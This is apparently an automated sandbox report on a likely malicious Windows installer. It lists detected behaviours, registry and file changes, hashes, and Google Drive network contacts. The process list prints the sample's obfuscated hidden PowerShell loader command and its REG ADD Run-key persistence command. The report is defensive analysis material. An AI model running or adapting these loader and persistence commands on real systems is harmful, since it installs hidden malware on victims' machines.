Analysis Overview
SHA256
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
Threat Level: Likely malicious
The file batterie daahindenes.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
NSIS installer
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Runs regedit.exe
Modifies registry key
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 08:05
Signatures
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 08:05
Reported
2024-07-09 08:15
Platform
win7-20240705-en
Max time kernel
597s
Max time network
493s
Command Line
Signatures
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2432 set thread context of 2008 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe
"C:\Users\Admin\AppData\Local\Temp\batterie daahindenes.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x598
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "1096" "880"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "3032" "880"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
Files
memory/2432-11-0x0000000073DE1000-0x0000000073DE2000-memory.dmp
memory/2432-12-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-14-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-13-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-15-0x0000000073DE0000-0x000000007438B000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid
| MD5 | d89dac6d6bcfb431c31bdf7d21f48fbd |
| SHA1 | 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9 |
| SHA256 | ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b |
| SHA512 | 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070 |
memory/2432-18-0x0000000073DE0000-0x000000007438B000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag
| MD5 | 1a78d0f226d0db154812e61b8cadb4b8 |
| SHA1 | e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e |
| SHA256 | 19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e |
| SHA512 | b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41 |
memory/2432-20-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/2432-21-0x00000000067F0000-0x000000000938E000-memory.dmp
memory/2432-22-0x0000000073DE0000-0x000000007438B000-memory.dmp
memory/1096-46-0x000000001B7E0000-0x000000001BAC2000-memory.dmp
memory/1096-47-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OutofProcReport259902064.txt
| MD5 | 52adb0f7ab38f06d59f3358e8a351803 |
| SHA1 | 5ec15aaa48cbd2a852cbf5c27831bef97e22b11f |
| SHA256 | bb9e8f95f27c2a26414412144046980f618f5b6bbb76dfd6376990429b087bce |
| SHA512 | 0e50950cee99d8676e16021415b8bbf5dc9c29ec622e9b747c479dcad0854948475dd452c588297464d0a16841192e2b4227fc6bcc5c55e59cda716bb2275b49 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 490919770ce4bf4f08ea6e727cd9d569 |
| SHA1 | 7a8b6fe38a3a4f43caa1acc7b12284b79422325f |
| SHA256 | f2da85200b8d5197a93363a1f003b6436ae48fbdcd40bb4a00c49b9af23d4936 |
| SHA512 | abee1c24e472e1d77d37ce344889d3baf790645f15301fbd9518603357ab7fb43d64fc6381c9cbd3fe25da0e4c351fc3a5ecd4a71fe774e80681e0c8687daab0 |
memory/3032-56-0x000000001B550000-0x000000001B832000-memory.dmp
memory/3032-57-0x0000000001DD0000-0x0000000001DD8000-memory.dmp
C:\Users\Admin\explorer.exe
| MD5 | ac4c51eb24aa95b77f705ab159189e24 |
| SHA1 | 4583daf9442880204730fb2c8a060430640494b1 |
| SHA256 | 6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a |
| SHA512 | 011bfe19bd15dcc0f9850575e20d7f2c01160ec98ba461ad59a51b9417049e6475648b9056990247699624b080cf609ec7b5409231cfb46a012d723f7db08d81 |
C:\Users\Admin\AppData\Local\Temp\OutofProcReport259948958.txt
| MD5 | 7f2449903a1c386d4d33278b8c03da5e |
| SHA1 | 6e103c0d1d028398d18470019f2f3c601f38cd26 |
| SHA256 | 565ee83bc2fd2271c034e558b6b64d646157b67920da2cb2cfa2f984a19700ae |
| SHA512 | 15e6cc8dc8e7743df55ae8d7dbaa72f48cd26aab4f479f3b3389fe50508a36b3213a4d77e878473fd30fb967e9265550b1fc95d00c2d548646750b6de8653314 |
memory/2580-63-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2580-64-0x0000000140000000-0x00000001405E8000-memory.dmp